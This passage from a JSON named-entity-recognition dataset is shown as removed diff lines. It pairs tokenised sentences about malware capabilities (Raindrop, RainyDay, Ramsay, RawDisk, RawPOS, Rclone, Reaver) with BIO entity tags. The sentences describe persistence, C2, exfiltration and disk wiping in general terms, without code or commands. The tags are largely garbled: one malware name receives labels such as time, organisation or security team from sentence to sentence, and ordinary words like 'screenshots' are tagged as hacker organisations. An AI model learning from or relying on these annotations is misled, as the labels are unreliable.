], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Raindrop", - "used", - "a", - "custom", - "packer", - "for", - "its", - "Cobalt", - "Strike", - "payload,", - "which", - "was", - "compressed", - "using", - "the", - "LZMA", - "algorithm." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Raindrop", - "used", - "steganography", - "to", - "locate", - "the", - "start", - "of", - "its", - "encoded", - "payload", - "within", - "legitimate", - "7-Zip", - "code." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "initial", - "installation,", - "Raindrop", - "runs", - "a", - "computation", - "to", - "delay", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "tools", - "to", - "collect", - "credentials", - "from", - "web", - "browsers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "side-loading", - "to", - "run", - "malicious", - "executables." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-HackOrg", - "B-HackOrg" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "a", - "file", - "exfiltration", - "tool", - "to", - "collect", - "recently", - "changed", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "decrypt", - "its", - "payload", - "via", - "a", - "XOR", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "has", - "downloaded", - "as", - "a", - "XOR-encrypted", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "a", - "file", - "exfiltration", - "tool", - "to", - "upload", - "specific", - "files", - "to", - "Dropbox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "RainyDay", - "has", - "the", - "ability", - "to", - "switch", - "between", - "TCP", - "and", - "HTTP", - "for", - "C2", - "if", - "one", - "method", - "is", - "not", - "working." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "has", - "the", - "ability", - "to", - "uninstall", - "itself", - "by", - "deleting", - "its", - "service", - "and", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "a", - "file", - "exfiltration", - "tool", - "to", - "collect", - "recently", - "changed", - "files", - "with", - "specific", - "extensions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "download", - "files", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "a", - "file", - "exfiltration", - "tool", - "to", - "copy", - "files", - "to", - "<code>C:\\ProgramData\\Adobe\\temp</code>", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "has", - "named", - "services", - "and", - "scheduled", - "tasks", - "to", - "appear", - "benign", - "including", - "\"ChromeCheck\"", - "and", - "\"googleupdate.\"" - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "RainyDay", - "has", - "used", - "names", - "to", - "mimic", - "legitimate", - "software", - "including", - "\"vmtoolsd.exe\"", - "to", - "spoof", - "Vmtools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "file", - "collection", - "tool", - "used", - "by", - "RainyDay", - "can", - "utilize", - "native", - "API", - "including", - "<code>ReadDirectoryChangeW</code>", - "for", - "folder", - "monitoring." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "TCP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "enumerate", - "processes", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "proxy", - "tools", - "including", - "boost_proxy_client", - "for", - "reverse", - "proxy", - "functionality." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "scheduled", - "tasks", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "has", - "the", - "ability", - "to", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "RC4", - "to", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "create", - "and", - "register", - "a", - "service", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "HTTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "the", - "Windows", - "Command", - "Shell", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "the", - "QuarksPwDump", - "tool", - "to", - "obtain", - "local", - "passwords", - "and", - "domain", - "cached", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RainyDay", - "can", - "use", - "services", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "insert", - "itself", - "into", - "the", - "address", - "space", - "of", - "other", - "applications", - "using", - "the", - "AppInit", - "DLL", - "Registry", - "key." - ], - "ner_tags": [ - "B-Tool", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "store", - "collected", - "documents", - "in", - "a", - "custom", - "container", - "after", - "encrypting", - "and", - "compressing", - "them", - "using", - "RC4", - "and", - "WinRAR." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "compress", - "and", - "archive", - "collected", - "files", - "using", - "WinRAR." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "conduct", - "an", - "initial", - "scan", - "for", - "Microsoft", - "Word", - "documents", - "on", - "the", - "local", - "system,", - "removable", - "media,", - "and", - "connected", - "network", - "drives,", - "before", - "tagging", - "and", - "collecting", - "them.", - "It", - "can", - "continue", - "tagging", - "documents", - "to", - "collect", - "with", - "follow", - "up", - "scans." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "use", - "UACMe", - "for", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "use", - "the", - "Windows", - "COM", - "API", - "to", - "schedule", - "tasks", - "and", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "hijack", - "outdated", - "Windows", - "application", - "dependencies", - "with", - "malicious", - "versions", - "of", - "its", - "own", - "DLL", - "payload." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "collect", - "Microsoft", - "Word", - "documents", - "from", - "the", - "target's", - "file", - "system,", - "as", - "well", - "as", - "<code>.txt</code>,", - "<code>.doc</code>,", - "and", - "<code>.xls</code>", - "files", - "from", - "the", - "Internet", - "Explorer", - "cache." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "collect", - "data", - "from", - "network", - "drives", - "and", - "stage", - "it", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "collect", - "data", - "from", - "removable", - "media", - "and", - "stage", - "it", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "extract", - "its", - "agent", - "from", - "the", - "body", - "of", - "a", - "malicious", - "document." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "been", - "delivered", - "using", - "OLE", - "objects", - "in", - "malicious", - "documents." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "use", - "<code>ImprovedReflectiveDLLInjection</code>", - "to", - "deploy", - "components." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "been", - "embedded", - "in", - "documents", - "exploiting", - "CVE-2017-0199,", - "CVE-2017-11882,", - "and", - "CVE-2017-8570." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "collect", - "directory", - "and", - "file", - "lists." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "stage", - "data", - "prior", - "to", - "exfiltration", - "in", - "<code>%APPDATA%\\Microsoft\\UserSetting</code>", - "and", - "<code>%APPDATA%\\Microsoft\\UserSetting\\MediaCache</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "been", - "executed", - "through", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "masqueraded", - "as", - "a", - "JPG", - "image", - "file." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "masqueraded", - "as", - "a", - "7zip", - "installer." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "use", - "Windows", - "API", - "functions", - "such", - "as", - "<code>WriteFile</code>,", - "<code>CloseHandle</code>,", - "and", - "<code>GetCurrentHwProfile</code>", - "during", - "its", - "collection", - "and", - "file", - "storage", - "operations.", - "Ramsay", - "can", - "execute", - "its", - "embedded", - "components", - "via", - "<code>CreateProcessA</code>", - "and", - "<code>ShellExecute</code>." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "scan", - "for", - "systems", - "that", - "are", - "vulnerable", - "to", - "the", - "EternalBlue", - "exploit." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "scan", - "for", - "network", - "drives", - "which", - "may", - "contain", - "documents", - "for", - "collection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "base64-encoded", - "its", - "portable", - "executable", - "and", - "hidden", - "itself", - "under", - "a", - "JPG", - "header.", - "Ramsay", - "can", - "also", - "embed", - "information", - "within", - "document", - "footers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "scan", - "for", - "removable", - "media", - "which", - "may", - "contain", - "documents", - "for", - "collection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "gather", - "a", - "list", - "of", - "running", - "processes", - "by", - "using", - "Tasklist." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "created", - "Registry", - "Run", - "keys", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "spread", - "itself", - "by", - "infecting", - "other", - "portable", - "executable", - "files", - "on", - "removable", - "drives." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "included", - "a", - "rootkit", - "to", - "evade", - "defenses." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "schedule", - "tasks", - "via", - "the", - "Windows", - "COM", - "API", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "take", - "screenshots", - "every", - "30", - "seconds", - "as", - "well", - "as", - "when", - "an", - "external", - "removable", - "storage", - "device", - "is", - "connected." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "been", - "distributed", - "through", - "spearphishing", - "emails", - "with", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "used", - "base64", - "to", - "encode", - "its", - "C2", - "traffic." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "PE", - "data", - "embedded", - "within", - "JPEG", - "files", - "contained", - "within", - "Word", - "documents." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "detect", - "system", - "information--including", - "disk", - "names,", - "total", - "space,", - "and", - "remaining", - "space--to", - "create", - "a", - "hardware", - "profile", - "GUID", - "which", - "acts", - "as", - "a", - "system", - "identifier", - "for", - "operators." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "use", - "ipconfig", - "and", - "Arp", - "to", - "collect", - "network", - "configuration", - "information,", - "including", - "routing", - "information", - "and", - "ARP", - "tables." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "use", - "<code>netstat</code>", - "to", - "enumerate", - "network", - "connections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "can", - "spread", - "itself", - "by", - "infecting", - "other", - "portable", - "executable", - "files", - "on", - "networks", - "shared", - "drives." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "included", - "embedded", - "Visual", - "Basic", - "scripts", - "in", - "malicious", - "documents." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ramsay", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "RawDisk", - "was", - "used", - "in", - "Shamoon", - "to", - "write", - "to", - "protected", - "system", - "locations", - "such", - "as", - "the", - "MBR", - "and", - "disk", - "partitions", - "in", - "an", - "effort", - "to", - "destroy", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "RawDisk", - "has", - "been", - "used", - "to", - "directly", - "access", - "the", - "hard", - "disk", - "to", - "help", - "overwrite", - "arbitrarily", - "sized", - "portions", - "of", - "disk", - "content." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RawDisk", - "was", - "used", - "in", - "Shamoon", - "to", - "help", - "overwrite", - "components", - "of", - "disk", - "structure", - "like", - "the", - "MBR", - "and", - "disk", - "partitions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-SamFile", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "RawPOS", - "encodes", - "credit", - "card", - "data", - "it", - "collected", - "from", - "the", - "victim", - "with", - "XOR." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RawPOS", - "dumps", - "memory", - "from", - "specific", - "processes", - "on", - "a", - "victim", - "system,", - "parses", - "the", - "dumped", - "files,", - "and", - "scrapes", - "them", - "for", - "credit", - "card", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Data", - "captured", - "by", - "RawPOS", - "is", - "placed", - "in", - "a", - "temporary", - "file", - "under", - "a", - "directory", - "named", - "\"memdump\"." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "New", - "services", - "created", - "by", - "RawPOS", - "are", - "made", - "to", - "appear", - "like", - "legitimate", - "Windows", - "services,", - "with", - "names", - "such", - "as", - "\"Windows", - "Management", - "Help", - "Service\",", - "\"Microsoft", - "Support\",", - "and", - "\"Windows", - "Advanced", - "Task", - "Manager\"." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Idus", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "RawPOS", - "installs", - "itself", - "as", - "a", - "service", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rclone", - "can", - "compress", - "files", - "using", - "`gzip`", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Rclone", - "\"chunker\"", - "overlay", - "supports", - "splitting", - "large", - "files", - "in", - "smaller", - "chunks", - "during", - "upload", - "to", - "circumvent", - "size", - "limits." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rclone", - "can", - "exfiltrate", - "data", - "over", - "SFTP", - "or", - "HTTPS", - "via", - "WebDAV." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Rclone", - "can", - "exfiltrate", - "data", - "over", - "FTP", - "or", - "HTTP,", - "including", - "HTTP", - "via", - "WebDAV." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Rclone", - "can", - "exfiltrate", - "data", - "to", - "cloud", - "storage", - "services", - "such", - "as", - "Dropbox,", - "Google", - "Drive,", - "Amazon", - "S3,", - "and", - "MEGA." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rclone", - "can", - "list", - "files", - "and", - "directories", - "with", - "the", - "`ls`,", - "`lsd`,", - "and", - "`lsl`", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "encrypts", - "collected", - "data", - "with", - "an", - "incremental", - "XOR", - "key", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "drops", - "and", - "executes", - "a", - "malicious", - "CPL", - "file", - "as", - "its", - "payload." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "encrypts", - "some", - "of", - "its", - "files", - "with", - "XOR." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "deletes", - "the", - "original", - "dropped", - "file", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Reaver", - "variants", - "use", - "raw", - "TCP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "queries", - "the", - "Registry", - "to", - "determine", - "the", - "correct", - "Startup", - "path", - "to", - "use", - "for", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "creates", - "a", - "shortcut", - "file", - "and", - "saves", - "it", - "in", - "a", - "Startup", - "folder", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Time", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "creates", - "a", - "shortcut", - "file", - "and", - "saves", - "it", - "in", - "a", - "Startup", - "folder", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Time", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "collects", - "system", - "information", - "from", - "the", - "victim,", - "including", - "CPU", - "speed,", - "computer", - "name,", - "volume", - "serial", - "number,", - "ANSI", - "code", - "page,", - "OEM", - "code", - "page", - "identifier", - "for", - "the", - "OS,", - "Microsoft", - "Windows", - "version,", - "and", - "memory", - "information." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "collects", - "the", - "victim's", - "IP", - "address." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "collects", - "the", - "victim's", - "username." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Reaver", - "variants", - "use", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Reaver", - "installs", - "itself", - "as", - "a", - "new", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "gather", - "browser", - "usernames", - 